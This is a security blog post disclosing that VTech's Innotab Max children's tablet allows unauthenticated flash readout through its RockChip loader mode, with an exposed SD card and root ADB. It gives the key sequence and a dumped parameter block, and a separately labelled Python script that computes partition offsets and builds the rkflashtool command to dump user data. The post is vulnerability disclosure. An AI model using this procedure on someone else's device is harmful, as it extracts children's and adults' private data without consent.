
VTech Innotab Max vulnerable to trivial data extraction

Ken Munro 02 Dec 2015

Just when you thought it couldn't get much worse for VTech toys after the recent breach, we found two easy ways to pull the data off their kids' Innotab tablet.

In the case of a lost, stolen or re-sold tablet, any and all data that the child or adult has put on there is exposed. Passwords, PINs, email addresses, app data, you name it.

We started by pulling the back off the tablet to see what we could find.

[Image: CPU]

…and there's our old friend the RockChip CPU. The model number printing isn't perfectly legible, but it looks to be an RK3188. In case you missed it in our older posts, the issue is as follows:

Most devices need a recovery mode so they can be brought back from a bricked state, say where an update went wrong. That is fine in itself; one would expect to be able to WRITE new firmware to the device in this state.

However, the RockChip loader mode also allows the existing flash contents to be READ back, with no authentication. That's a huge fail.

So, plug in a USB cable, hold cursor left and cursor up, and hold the power button for 3 seconds, and you enter flash mode. You'll need rkflashtool to talk to the device; reading the parameter block is the first step, and here is what you'll retrieve:

FIRMWARE_VER:4.1.1
MACHINE_MODEL:rk30sdk
MACHINE_ID:007
MANUFACTURER:RK30SDK
MAGIC: 0x5041524B
ATAG: 0x60000800
MACHINE: 3066
CHECK_MASK: 0x80
KERNEL_IMG: 0x60408000
#RECOVER_KEY: 1,1,0,20,0
CMDLINE:board.ap_mdm=0 board.ap_has_earphone=1 board.ap_has_alsa=0 board.ap_multi_card=0 board.ap_data_only=2 console=ttyFIQ0 androidboot.console=ttyFIQ0 init=/init initrd=0x62000000,0x00800000 mtdparts=rk29xxnand:0x00002000@0x00002000(misc),0x00006000@0x00004000(kernel),0x00006000@0x0000a000(boot),0x00010000@0x00010000(recovery),0x00020000@0x00020000(backup),0x00040000@0x00040000(cache),0x00002000@0x00080000(kpanic),0x00004000@0x00082000(app),0x00300000@0x00086000(system),0x00100000@0x00386000(data),-@0x00486000(userdata)

Lots of lovely data in there: the Android version is 4.1.1, which isn't great, and the mtdparts entry gives the complete flash layout, including the start of the user data partition (`-@0x00486000(userdata)`, i.e. offset 0x00486000 and running to the end of flash).

Simply dump the data partition with rkflashtool (it will take an hour or so over USB), mount the image read-only on a PC, and off you go with someone else's data.
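The step between "read the parameters" and "dump the partition" is working out where each partition sits. The following is an added example, not code from the original post or from rkflashtool: it parses the parameter block shown above (embedded here as a constructed sample, with the wrapped CMDLINE joined back into one line), turns the mtdparts entry into a partition table, checks the layout for gaps or overlaps, and builds the `rkflashtool r offset nsectors` command for a named partition. It assumes, as Rockchip parameter files do, that mtdparts offsets and sizes are in 512-byte sectors, and that `-` means "to the end of flash", so the open-ended userdata partition needs the total flash size passed in (the tool can read that from the device; it is not in the parameter block).

```python
"""Parse a Rockchip parameter block (as read back with rkflashtool) and turn
its mtdparts entry into partition offsets that can be fed to `rkflashtool r`.

Added example, not the original post's code. Assumptions:
  * mtdparts offsets and sizes are in 512-byte sectors (Rockchip convention,
    and the unit `rkflashtool r offset nsectors` expects)
  * a size of "-" means "to the end of flash"
  * the total flash size is not in the parameter block, so it must be supplied
"""
import re

SECTOR = 512

# Constructed sample input: the parameter block printed in the post above,
# with the wrapped CMDLINE rejoined into a single line.
SAMPLE_PARAMS = """FIRMWARE_VER:4.1.1
MACHINE_MODEL:rk30sdk
MACHINE_ID:007
MANUFACTURER:RK30SDK
MAGIC: 0x5041524B
ATAG: 0x60000800
MACHINE: 3066
CHECK_MASK: 0x80
KERNEL_IMG: 0x60408000
#RECOVER_KEY: 1,1,0,20,0
CMDLINE:board.ap_mdm=0 board.ap_has_earphone=1 board.ap_has_alsa=0 board.ap_multi_card=0 board.ap_data_only=2 console=ttyFIQ0 androidboot.console=ttyFIQ0 init=/init initrd=0x62000000,0x00800000 mtdparts=rk29xxnand:0x00002000@0x00002000(misc),0x00006000@0x00004000(kernel),0x00006000@0x0000a000(boot),0x00010000@0x00010000(recovery),0x00020000@0x00020000(backup),0x00040000@0x00040000(cache),0x00002000@0x00080000(kpanic),0x00004000@0x00082000(app),0x00300000@0x00086000(system),0x00100000@0x00386000(data),-@0x00486000(userdata)
"""

# One partition entry: SIZE@OFFSET(NAME), where SIZE may be "-" (to end of flash).
PART_RE = re.compile(r"(?P<size>-|0x[0-9a-fA-F]+)@(?P<offset>0x[0-9a-fA-F]+)\((?P<name>[^)]+)\)")


def parse_params(text):
    """Return {KEY: VALUE} for the KEY:VALUE lines, skipping '#' comments.
    Only the first ':' splits, so the colons inside CMDLINE survive."""
    params = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition(":")
        if sep:
            params[key.strip()] = value.strip()
    return params


def parse_mtdparts(cmdline):
    """Return (flash_device, [ {name, offset, size} ... ]) in flash order.
    offset/size are in sectors; size is None for an open-ended partition."""
    m = re.search(r"mtdparts=(?P<dev>[^:\s]+):(?P<parts>\S+)", cmdline)
    if not m:
        raise ValueError("no mtdparts= entry in CMDLINE")
    parts = []
    for pm in PART_RE.finditer(m.group("parts")):
        size = pm.group("size")
        parts.append({
            "name": pm.group("name"),
            "offset": int(pm.group("offset"), 16),
            "size": None if size == "-" else int(size, 16),
        })
    return m.group("dev"), parts


def check_layout(parts):
    """Return a list of problems: gaps or overlaps between consecutive
    partitions, or an open-ended partition that is not the last one."""
    problems = []
    for prev, cur in zip(parts, parts[1:]):
        if prev["size"] is None:
            problems.append(f"{prev['name']} is open-ended but not last")
            continue
        end = prev["offset"] + prev["size"]
        if end != cur["offset"]:
            kind = "overlap" if end > cur["offset"] else "gap"
            problems.append(f"{kind} between {prev['name']} and {cur['name']}")
    return problems


def dump_command(parts, name, flash_sectors=None, out=None):
    """Build the `rkflashtool r offset nsectors > file` line for partition
    `name` (decimal sector counts). An open-ended partition needs the total
    flash size in sectors, which is not in the parameter block."""
    part = next((p for p in parts if p["name"] == name), None)
    if part is None:
        raise KeyError(name)
    nsectors = part["size"]
    if nsectors is None:
        if flash_sectors is None:
            raise ValueError(f"{name} runs to end of flash; pass flash_sectors")
        nsectors = flash_sectors - part["offset"]
    return f"rkflashtool r {part['offset']} {nsectors} > {out or name + '.img'}"


if __name__ == "__main__":
    params = parse_params(SAMPLE_PARAMS)
    dev, parts = parse_mtdparts(params["CMDLINE"])
    print(f"Android {params['FIRMWARE_VER']}, flash device {dev}")
    for p in parts:
        size = "to end" if p["size"] is None else f"{p['size'] * SECTOR / 2**20:.0f} MiB"
        print(f"{p['name']:10s} @ {p['offset'] * SECTOR / 2**20:8.0f} MiB  {size}")
    print(check_layout(parts) or "layout is contiguous: no gaps, no overlaps")
    print(dump_command(parts, "data"))
```

Run it as-is to see the table for the Innotab layout; in practice you would feed it the output of `rkflashtool p` from the device you are looking at. The resulting image is a raw partition dump, so mount it read-only on a PC (`mount -o ro,loop`) and work on the copy rather than the device; the `check_layout` step is worth keeping because a hand-typed or truncated mtdparts line is the usual reason a dump comes back as garbage.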

This bug has been known about for well over 2 years. It’s a bit lame of VTech to continue shipping vulnerable tablets, tablets that expose children’s data…

But that’s not all!

There’s a microSD card on the motherboard. It was glued on, but that took seconds to prise off.

[Image: vtech-SDcard]

A quick read shows that it’s the filesystem and user data. Yes, really. On a removable SD card. Other than making for another easy route to extract sensitive data, that’s also asking for reliability trouble down the line.

There are several GB of data on there; we haven't had time to analyse it yet, but here's a hexdump to prove the point.

[Image: vtech-hexdump]

And to wrap up, another bug to boot

ADB enabled by default. Looks like we’re root too.

[Image: vtechadb]

Verdict? VTech could do a LOT better with the security of their hardware that stores our children’s data.